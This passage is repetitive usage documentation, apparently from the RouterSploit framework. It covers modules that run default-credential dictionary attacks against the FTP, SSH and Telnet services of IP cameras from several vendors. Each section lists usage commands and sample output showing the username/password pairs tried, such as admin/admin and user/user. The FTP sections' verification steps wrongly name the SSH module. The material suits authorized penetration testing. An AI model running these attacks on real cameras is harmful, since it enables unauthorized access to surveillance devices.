[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Cisco Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/cisco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/cisco/ftp_default_creds
rsf (Cisco Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Cisco Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/cisco/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/cisco/ssh_default_creds
rsf (Cisco Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Cisco Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/cisco/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/cisco/telnet_default_creds
rsf (Cisco Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Cisco Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against D-Link Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/dlink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/ftp_default_creds
rsf (D-Link Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against D-Link Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/dlink/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/ssh_default_creds
rsf (D-Link Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against D-Link Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/dlink/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/dlink/telnet_default_creds
rsf (D-Link Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (D-Link Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against GeoVision Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/geovision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/geovision/ftp_default_creds
rsf (GeoVision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against GeoVision Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/geovision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/geovision/ssh_default_creds
rsf (GeoVision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against GeoVision Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/geovision/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/geovision/telnet_default_creds
rsf (GeoVision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (GeoVision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Grandstream Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/grandstream/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/grandstream/ftp_default_creds
rsf (Grandstream Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Grandstream Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Grandstream Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/grandstream/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/grandstream/ssh_default_creds
rsf (Grandstream Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Grandstream Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Grandstream Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/grandstream/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/grandstream/telnet_default_creds
rsf (Grandstream Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Grandstream Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Hikvision Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/hikvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/hikvision/ftp_default_creds
rsf (Hikvision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Hikvision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Hikvision Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/hikvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/hikvision/ssh_default_creds
rsf (Hikvision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Hikvision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Hikvision Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/hikvision/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/hikvision/telnet_default_creds
rsf (Hikvision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Hikvision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Honeywell Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/honeywell/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/honeywell/ftp_default_creds
rsf (Honeywell Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Honeywell Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/honeywell/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/honeywell/ssh_default_creds
rsf (Honeywell Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Honeywell Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/honeywell/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/honeywell/telnet_default_creds
rsf (Honeywell Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Honeywell Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against IQInvision Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/iqinvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/iqinvision/ftp_default_creds
rsf (IQInvision Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against IQInvision Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/iqinvision/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/iqinvision/ssh_default_creds
rsf (IQInvision Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against IQInvision Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/iqinvision/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/iqinvision/telnet_default_creds
rsf (IQInvision Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (IQInvision Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against JVC Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/jvc/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/jvc/ftp_default_creds
rsf (JVC Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (JVC Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against JVC Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/jvc/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/jvc/ssh_default_creds
rsf (JVC Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (JVC Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against JVC Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/jvc/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/jvc/telnet_default_creds
rsf (JVC Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (JVC Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 23 telnet user user
```
## Description
Module performs dictionary attack with default credentials against Mobotix Camera FTP service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/mobotix/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/mobotix/ftp_default_creds
rsf (Mobotix Camera Default FTP Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default FTP Creds) > run
[*] Running module...
[*] Target exposes FTP service
[*] Starting attack against FTP service
[*] thread-0 thread is starting...
[-] Authentication Failed - Username: 'admin' Password: '12345'
[-] Authentication Failed - Username: 'admin' Password: '123456'
[-] Authentication Failed - Username: 'Admin' Password: '12345'
[-] Authentication Failed - Username: 'Admin' Password: '123456'
[+] Authenticated Succeed - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 0.06290411949157715 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 21 ftp admin admin
```
## Description
Module performs dictionary attack with default credentials against Mobotix Camera SSH service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/mobotix/ssh_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/mobotix/ssh_default_creds
rsf (Mobotix Camera Default SSH Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default SSH Creds) > run
[*] Running module...
[*] Target exposes SSH service
[*] Starting default credentials attack against SSH service
[*] thread-0 thread is starting...
[-] SSH Authentication Failed - Username: 'admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'admin' Password: '123456'
[-] SSH Authentication Failed - Username: 'Admin' Password: '12345'
[-] SSH Authentication Failed - Username: 'Admin' Password: '123456'
[+] SSH Authentication Successful - Username: 'admin' Password: 'admin'
[*] thread-0 thread is terminated.
[*] Elapsed time: 2.3932292461395264 seconds
[+] Credentials found!
Target Port Service Username Password
------ ---- ------- -------- --------
192.168.1.1 22 ssh admin admin
```
## Description
Module performs dictionary attack with default credentials against Mobotix Camera Telnet service.
If valid credentials are found, they are displayed to the user.
## Verification Steps
1. Start `./rsf.py`
2. Do: `use creds/cameras/mobotix/telnet_default_creds`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If valid credentials are found, they are displayed to the user.
## Scenarios
```
rsf > use creds/cameras/mobotix/telnet_default_creds
rsf (Mobotix Camera Default Telnet Creds) > set target 192.168.1.1
[+] target => 192.168.1.1
rsf (Mobotix Camera Default Telnet Creds) > run
[*] Running module...
[*] Target exposes Telnet service
[*] Starting default credentials attack against Telnet service
[*] thread-0 thread is starting...
[-] Telnet Authentication Failed - Username: 'admin' Password: 'admin'
[-] Telnet Authentication Failed - Username: '1234' Password: '1234'
[-] Telnet Authentication Failed - Username: 'root' Password: '12345'
[-] Telnet Authentication Failed - Username: 'root' Password: 'root'
[+] Telnet Authentication Successful - Username: 'user' Password: 'user'
[*] thread-0 thread is terminated.
[*] Elapsed time: 5.389287948608398 seconds
